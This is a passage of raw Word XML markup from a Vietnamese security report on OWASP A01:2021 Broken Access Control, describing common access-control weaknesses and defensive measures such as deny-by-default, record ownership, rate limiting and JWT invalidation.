        </w:rPr>
        <w:t>Send</w:t>
      </w:r>
      <w:r w:rsidRPr="0030151F">
        <w:t>. Câu truy vấn sẽ đ</w:t>
      </w:r>
      <w:r w:rsidRPr="0030151F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r w:rsidRPr="0030151F">
        <w:t>ợc gửi lên máy chủ</w:t>
      </w:r>
      <w:r w:rsidR="00896A3F">
        <w:t xml:space="preserve"> (server)</w:t>
      </w:r>
      <w:r w:rsidRPr="0030151F">
        <w:t xml:space="preserve"> và kết quả câu request sẽ đ</w:t>
      </w:r>
      <w:r w:rsidRPr="0030151F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r w:rsidRPr="0030151F">
        <w:t>ợc hiển thị ở tab response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102910CE" w14:textId="153835B5" w:rsidR="0030151F" w:rsidRPr="0030151F" w:rsidRDefault="0030151F" w:rsidP="0030151F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="287110A3" wp14:editId="139CE2D9">
            <wp:extent cx="6151880" cy="2936240"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
            <wp:docPr id="2078076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76906" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6151880" cy="2936240"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3276D879" w14:textId="77777777" w:rsidR="0030151F" w:rsidRDefault="0030151F">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="701A777A" w14:textId="52556E57" w:rsidR="00151DDF" w:rsidRDefault="00151DDF" w:rsidP="00151DDF">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="432" w:hanging="432"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc182909822"/>
      <w:r w:rsidRPr="00955E98">
        <w:lastRenderedPageBreak/>
        <w:t>A01:2021 – Broken Access Control</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="554DCBF0" w14:textId="109AE2F1" w:rsidR="00A132BF" w:rsidRDefault="00151DDF" w:rsidP="00F41059">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc182909823"/>
      <w:r w:rsidRPr="00151DDF">
        <w:t>Mô tả lỗ hổng</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="5FCF40C2" w14:textId="7607B630" w:rsidR="005D0569" w:rsidRPr="000B1857" w:rsidRDefault="00067F0D" w:rsidP="000B1857">
      <w:r w:rsidRPr="000B1857">
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="005D0569" w:rsidRPr="000B1857">
        <w:t>Kiểm soát truy cập thực hiện việc thực thi chính sách sao cho ng</w:t>
      </w:r>
      <w:r w:rsidR="005D0569" w:rsidRPr="000B1857">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r w:rsidR="005D0569" w:rsidRPr="000B1857">
        <w:t>ời dùng không thể thực hiện các hành động khác ngoài các quyền họ đ</w:t>
      </w:r>
      <w:r w:rsidR="005D0569" w:rsidRPr="000B1857">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r w:rsidR="005D0569" w:rsidRPr="000B1857">
        <w:t>ợc dự định. Lỗi phân quyền sẽ dẫn đến một số hậu quả nh</w:t>
      </w:r>
      <w:r w:rsidR="005D0569" w:rsidRPr="000B1857">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r w:rsidR="005D0569" w:rsidRPr="000B1857">
        <w:t xml:space="preserve"> việc tiết lộ thông tin trái phép, sửa đổi hoặc phá huỷ tất cả dữ liệu hoặc chức năng kinh doanh ngoài giới hạn của ng</w:t>
      </w:r>
      <w:r w:rsidR="005D0569" w:rsidRPr="000B1857">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r w:rsidR="005D0569" w:rsidRPr="000B1857">
        <w:t>ời dùng đó đ</w:t>
      </w:r>
      <w:r w:rsidR="005D0569" w:rsidRPr="000B1857">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r w:rsidR="005D0569" w:rsidRPr="000B1857">
        <w:t>ợc phép. Các lỗ hổng kiểm soát truy cập phổ biến:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66914B2B" w14:textId="1085E9F5" w:rsidR="005D0569" w:rsidRPr="000B1857" w:rsidRDefault="005D0569" w:rsidP="00B44E85">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000B1857">
        <w:t>Vi phạm nguyên tắc đặc quyền tối thiểu hoặc từ chối theo mặc định, trong đó quyền truy cập chỉ đ</w:t>
      </w:r>
      <w:r w:rsidRPr="000B1857">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r w:rsidRPr="000B1857">
        <w:t>ợc cấp cho các khả năng, vai trò hoặc ng</w:t>
      </w:r>
      <w:r w:rsidRPr="000B1857">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r w:rsidRPr="000B1857">
        <w:t>ời dùng cụ thể nh</w:t>
      </w:r>
      <w:r w:rsidRPr="000B1857">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r w:rsidRPr="000B1857">
        <w:t>ng cuối cùng lại mở sẵn cho mọi ng</w:t>
      </w:r>
      <w:r w:rsidRPr="000B1857">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r w:rsidRPr="000B1857">
        <w:t>ời.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9B44B1" w14:textId="7E76592C" w:rsidR="005D0569" w:rsidRPr="000B1857" w:rsidRDefault="005D0569" w:rsidP="00B44E85">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000B1857">
        <w:t>Bỏ qua kiểm soát truy cập bằng cách sửa đổi URL, trạng thái nội bộ của ứng dụng, trang HTML hoặc sửa đổi các yêu cầu API</w:t>
      </w:r>
      <w:r w:rsidR="000B1857" w:rsidRPr="000B1857">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06FDDD3C" w14:textId="3E55BF95" w:rsidR="005D0569" w:rsidRPr="000B1857" w:rsidRDefault="005D0569" w:rsidP="00B44E85">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000B1857">
        <w:t>Cho phép truy cập hoặc chỉnh sửa tài khoản ng</w:t>
      </w:r>
      <w:r w:rsidRPr="000B1857">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r w:rsidRPr="000B1857">
        <w:t>ời dùng khác bằng cách cung cấp định danh duy nhất của tài khoản đó (tham chiếu đối t</w:t>
      </w:r>
      <w:r w:rsidRPr="000B1857">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r w:rsidRPr="000B1857">
        <w:t>ợng trực tiếp không an toàn)</w:t>
      </w:r>
      <w:r w:rsidR="000B1857">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D739C48" w14:textId="72339249" w:rsidR="005D0569" w:rsidRPr="000B1857" w:rsidRDefault="005D0569" w:rsidP="00B44E85">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000B1857">
        <w:t>Truy cập API với không có kiểm soát truy cập nào dành cho các ph</w:t>
      </w:r>
      <w:r w:rsidRPr="000B1857">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ươ</w:t>
      </w:r>
      <w:r w:rsidRPr="000B1857">
        <w:t>ng thức POST, PUT và DELETE</w:t>
      </w:r>
      <w:r w:rsidR="000B1857">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0521ADF0" w14:textId="53C62E31" w:rsidR="008A7AD8" w:rsidRPr="000B1857" w:rsidRDefault="005D0569" w:rsidP="00B44E85">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000B1857">
        <w:t>Nâng cao đặc quyền. Ví dụ nh</w:t>
      </w:r>
      <w:r w:rsidRPr="000B1857">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r w:rsidRPr="000B1857">
        <w:t xml:space="preserve"> khi đăng nhập tài khoản ng</w:t>
      </w:r>
      <w:r w:rsidRPr="000B1857">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r w:rsidRPr="000B1857">
        <w:t>ời dùng th</w:t>
      </w:r>
      <w:r w:rsidRPr="000B1857">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r w:rsidRPr="000B1857">
        <w:t>ờng thì hành động nh</w:t>
      </w:r>
      <w:r w:rsidRPr="000B1857">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r w:rsidRPr="000B1857">
        <w:t xml:space="preserve"> ng</w:t>
      </w:r>
      <w:r w:rsidRPr="000B1857">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r w:rsidRPr="000B1857">
        <w:t>ời dùng quản trị hoặc khi không đăng nhập ứng dụng nh</w:t>
      </w:r>
      <w:r w:rsidRPr="000B1857">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r w:rsidRPr="000B1857">
        <w:t>ng hành động nh</w:t>
      </w:r>
      <w:r w:rsidRPr="000B1857">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r w:rsidRPr="000B1857">
        <w:t xml:space="preserve"> ng</w:t>
      </w:r>
      <w:r w:rsidRPr="000B1857">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r w:rsidRPr="000B1857">
        <w:t>ời dùng bình th</w:t>
      </w:r>
      <w:r w:rsidRPr="000B1857">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r w:rsidRPr="000B1857">
        <w:t>ờng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE2724A" w14:textId="3F7FF421" w:rsidR="005D0569" w:rsidRPr="000B1857" w:rsidRDefault="005D0569" w:rsidP="00B44E85">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000B1857">
        <w:t>Thao túng siêu dữ liệu (metadata), chẳng hạn nh</w:t>
      </w:r>
      <w:r w:rsidRPr="000B1857">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r w:rsidRPr="000B1857">
        <w:t xml:space="preserve"> phát lại mã JSON Web Token (JWT), mã kiểm soát truy cập, giả mạo cookie hoặc các tr</w:t>
      </w:r>
      <w:r w:rsidRPr="000B1857">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r w:rsidRPr="000B1857">
        <w:t>ờng ẩn, để từ đó nâng cao đặc quyền hoặc lạm dụng tính không thể bị vô hiệu hoá tr</w:t>
      </w:r>
      <w:r w:rsidRPr="000B1857">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r w:rsidRPr="000B1857">
        <w:t>ớc hạn của JWT token.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15932F6B" w14:textId="7240769E" w:rsidR="005D0569" w:rsidRPr="000B1857" w:rsidRDefault="005D0569" w:rsidP="00B44E85">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000B1857">
        <w:t>API có thể đ</w:t>
      </w:r>
      <w:r w:rsidRPr="000B1857">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r w:rsidRPr="000B1857">
        <w:t>ợc truy cập từ nguồn trái phép hoặc không đáng tin cậy do cấu hình sai CORS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA02655" w14:textId="66992790" w:rsidR="00DE0F4E" w:rsidRDefault="00DE0F4E" w:rsidP="00F41059">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc182909824"/>
      <w:r>
        <w:t xml:space="preserve">Biện pháp </w:t>
      </w:r>
      <w:r w:rsidR="00EC0F26">
        <w:t>ngăn chặn</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="17BB1E25" w14:textId="6B3968A2" w:rsidR="00DE0F4E" w:rsidRPr="000B1857" w:rsidRDefault="003B497F" w:rsidP="000B1857">
      <w:r w:rsidRPr="000B1857">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="000B1857" w:rsidRPr="000B1857">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00DE0F4E" w:rsidRPr="000B1857">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ừ chối truy cập theo mặc định</w:t>
      </w:r>
      <w:r w:rsidR="000B1857" w:rsidRPr="000B1857">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> ngoại trừ các tài nguyên công cộng</w:t>
      </w:r>
      <w:r w:rsidR="00DE0F4E" w:rsidRPr="000B1857">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="000B1857">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000B1857">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Ví dụ:</w:t>
      </w:r>
      <w:r w:rsidRPr="000B1857">
        <w:t xml:space="preserve"> Một ứng dụng web có trang quản trị dành riêng cho quản trị viên và các trang công cộng cho người dùng. Để bảo vệ trang quản trị, thiết lập cấu hình máy chủ để chỉ những người dùng có quyền quản trị mới có thể truy cập trang này. Mọi truy cập không được phép sẽ bị từ chối theo mặc định, và chỉ các tài nguyên công cộng như trang chủ hoặc các bài viết mới được cho phép truy cập.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00803C99" w14:textId="63FCB761" w:rsidR="00DE0F4E" w:rsidRPr="000B1857" w:rsidRDefault="003B497F" w:rsidP="000B1857">
      <w:r w:rsidRPr="000B1857">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="00DE0F4E" w:rsidRPr="000B1857">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Triển khai cơ chế kiểm soát truy cập một lần và sử dụng lại trong toàn bộ ứng dụng, bao gồm việc giảm thiểu sử dụng CORS</w:t>
      </w:r>
      <w:r w:rsidRPr="000B1857">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="000B1857">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000B1857">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Ví dụ: </w:t>
      </w:r>
      <w:r w:rsidRPr="000B1857">
        <w:t xml:space="preserve">Trong một ứng dụng web, tạo một module kiểm soát truy cập chung với các quy tắc bảo mật cụ thể, như yêu cầu người dùng đăng nhập trước khi truy cập vào các chức năng nhất định. Module này sẽ được tái sử dụng trên tất cả các trang trong ứng dụng thay vì viết riêng cho từng trang, giúp dễ dàng quản lý và cập nhật khi cần thiết. </w:t>
      </w:r>
      <w:r w:rsidR="000B1857" w:rsidRPr="000B1857">
        <w:t>Thực hiện việc</w:t>
      </w:r>
      <w:r w:rsidRPr="000B1857">
        <w:t xml:space="preserve"> giới hạn CORS (Cross-Origin Resource Sharing) chỉ cho phép các miền đáng tin cậy truy cập dữ liệu từ ứng dụng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B1F98B" w14:textId="113A26C8" w:rsidR="003B497F" w:rsidRPr="000B1857" w:rsidRDefault="003B497F" w:rsidP="000B1857">
      <w:r w:rsidRPr="000B1857">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="00DE0F4E" w:rsidRPr="000B1857">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mô hình kiểm soát truy cập nên thực thi quyền sở hữu hồ sơ</w:t>
      </w:r>
      <w:r w:rsidRPr="000B1857">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>, hay bản ghi (record)</w:t>
      </w:r>
      <w:r w:rsidR="00DE0F4E" w:rsidRPr="000B1857">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> thay vì chấp nhận rằng người dùng có thể tạo, đọc, cập nhật hoặc xóa bất kỳ hồ sơ nào. </w:t>
      </w:r>
      <w:r w:rsidRPr="000B1857">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Ví dụ: </w:t>
      </w:r>
      <w:r w:rsidRPr="000B1857">
        <w:t xml:space="preserve">Trong một hệ thống quản lý hồ sơ y tế, khi người dùng “John” đăng nhập, </w:t>
      </w:r>
      <w:r w:rsidR="000B1857" w:rsidRPr="000B1857">
        <w:t xml:space="preserve">John </w:t>
      </w:r>
      <w:r w:rsidRPr="000B1857">
        <w:t xml:space="preserve">chỉ có thể xem, cập nhật, hoặc xóa các hồ sơ y tế do chính </w:t>
      </w:r>
      <w:r w:rsidR="000B1857" w:rsidRPr="000B1857">
        <w:t>John</w:t>
      </w:r>
      <w:r w:rsidRPr="000B1857">
        <w:t xml:space="preserve"> tạo hoặc có quyền sở hữu như hồ sơ khám bệnh</w:t>
      </w:r>
      <w:r w:rsidR="000B1857">
        <w:t xml:space="preserve">,.... </w:t>
      </w:r>
      <w:r w:rsidRPr="000B1857">
        <w:t>Hệ thống sẽ không cho phép John truy cập vào hồ sơ của bệnh nhân khác, đảm bảo dữ liệu cá nhân không bị truy cập trái phép.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0500615F" w14:textId="09489B9B" w:rsidR="002E4B1D" w:rsidRPr="000B1857" w:rsidRDefault="002E4B1D" w:rsidP="000B1857">
      <w:r w:rsidRPr="000B1857">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="00DE0F4E" w:rsidRPr="000B1857">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Các yêu cầu giới hạn kinh doanh đặc thù của ứng dụng nên được thực thi bởi mô hình miền</w:t>
      </w:r>
      <w:r w:rsidRPr="000B1857">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (domain models)</w:t>
      </w:r>
      <w:r w:rsidR="00DE0F4E" w:rsidRPr="000B1857">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="000B1857">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000B1857">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Ví dụ:</w:t>
      </w:r>
      <w:r w:rsidRPr="000B1857">
        <w:t xml:space="preserve"> Một ứng dụng bán hàng trực tuyến có yêu cầu rằng chỉ quản lý mới có quyền phê duyệt đơn hàng lớn hơn 10,000 đô la. Hệ thống sẽ thực thi quy tắc này bằng cách kiểm tra vai trò của người dùng khi xử lý đơn hàng, và chỉ cho phép các thao tác liên quan đến phê duyệt với những người có vai trò quản lý.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B723D8" w14:textId="1DF43A26" w:rsidR="002E4B1D" w:rsidRPr="000B1857" w:rsidRDefault="002E4B1D" w:rsidP="000B1857">
      <w:r w:rsidRPr="000B1857">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>- Tắt liệt kê thư mục web server và đảm bảo metadata của file (ví dụ: .git) và các tệp sao lưu không tồn tại trong gốc web và không được truy cập công cộng.</w:t>
      </w:r>
      <w:r w:rsidRPr="000B1857">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000B1857">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Ví dụ:</w:t>
      </w:r>
      <w:r w:rsidRPr="000B1857">
        <w:t xml:space="preserve"> Để bảo mật máy chủ web, </w:t>
      </w:r>
      <w:r w:rsidR="000B1857">
        <w:t xml:space="preserve">thực hiện </w:t>
      </w:r>
      <w:r w:rsidRPr="000B1857">
        <w:t xml:space="preserve">cấu hình máy chủ để vô hiệu hóa tính năng liệt kê thư mục, đảm bảo rằng các thư mục và tệp tin nhạy cảm như </w:t>
      </w:r>
      <w:r w:rsidRPr="004D4BC1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>.git</w:t>
      </w:r>
      <w:r w:rsidRPr="000B1857">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="004D4BC1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>.env</w:t>
      </w:r>
      <w:r w:rsidRPr="000B1857">
        <w:t xml:space="preserve">, hoặc các tệp sao </w:t>
      </w:r>
      <w:r w:rsidRPr="000B1857">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">lưu như </w:t>
      </w:r>
      <w:r w:rsidRPr="004D4BC1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>.bak</w:t>
      </w:r>
      <w:r w:rsidRPr="000B1857">
        <w:t xml:space="preserve"> không thể bị truy cập từ trình duyệt. Điều này ngăn ngừa kẻ tấn công dò tìm và truy cập vào các tệp này để thu thập thông tin nhạy cảm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56CB11B3" w14:textId="6DF06128" w:rsidR="002E4B1D" w:rsidRPr="000B1857" w:rsidRDefault="002E4B1D" w:rsidP="000B1857">
      <w:r w:rsidRPr="004D4BC1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>- Ghi lại các lỗi kiểm soát truy cập, cảnh báo quản trị viên khi thích hợp (ví dụ: repeated failures).</w:t>
      </w:r>
      <w:r w:rsidRPr="000B1857">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004D4BC1">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Ví dụ:</w:t>
      </w:r>
      <w:r w:rsidRPr="000B1857">
        <w:t xml:space="preserve"> Khi có nhiều lần truy cập thất bại vào một trang quản trị, hệ thống sẽ ghi lại log chi tiết, bao gồm địa chỉ IP và thời gian truy cập. Nếu các lỗi xảy ra liên tục, hệ thống sẽ gửi cảnh báo đến quản trị viên để kiểm tra và xác định xem có phải là một cuộc tấn công đang diễn ra hay không.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E1599E" w14:textId="2B1EEC56" w:rsidR="002E4B1D" w:rsidRPr="004D4BC1" w:rsidRDefault="002E4B1D" w:rsidP="004D4BC1">
      <w:r w:rsidRPr="004D4BC1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">- Giới hạn tần suất truy cập API và controller để giảm thiểu thiệt hại từ các cuộc tấn công tự động. </w:t>
      </w:r>
      <w:r w:rsidRPr="004D4BC1">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Ví dụ:</w:t>
      </w:r>
      <w:r w:rsidRPr="004D4BC1">
        <w:t xml:space="preserve"> Một ứng dụng API giới hạn số lượng yêu cầu từ một người dùng trong khoảng thời gian nhất định, chẳng hạn không quá 100 yêu cầu mỗi phút. Nếu số lượng yêu cầu vượt quá mức cho phép, hệ thống sẽ từ chối các yêu cầu tiếp theo và ghi lại các hành vi bất thường, ngăn chặn các cuộc tấn công brute-force hoặc DDoS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F2FAD8" w14:textId="648EB5FB" w:rsidR="002E4B1D" w:rsidRPr="004D4BC1" w:rsidRDefault="002E4B1D" w:rsidP="004D4BC1">
      <w:r w:rsidRPr="004D4BC1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">- Các token JWT nên bị vô hiệu hóa trên máy chủ sau khi đăng xuất. </w:t>
      </w:r>
      <w:r w:rsidRPr="004D4BC1">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Ví dụ:</w:t>
      </w:r>
      <w:r w:rsidRPr="004D4BC1">
        <w:t xml:space="preserve"> Khi người dùng đăng xuất khỏi ứng dụng, hệ thống không chỉ xóa token JWT khỏi trình duyệt mà còn cập nhật trạng thái token trên máy chủ, đánh dấu token đó là không hợp lệ. Điều này đảm bảo rằng token cũ không thể được sử dụng lại để truy cập trái phép vào hệ thống.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580A09B3" w14:textId="5E42102A" w:rsidR="002E4B1D" w:rsidRPr="004D4BC1" w:rsidRDefault="002E4B1D" w:rsidP="004D4BC1">
      <w:r w:rsidRPr="004D4BC1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>- Các nhà phát triển và nhân viên QA</w:t>
      </w:r>
      <w:r w:rsidR="00D01C11" w:rsidRPr="004D4BC1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
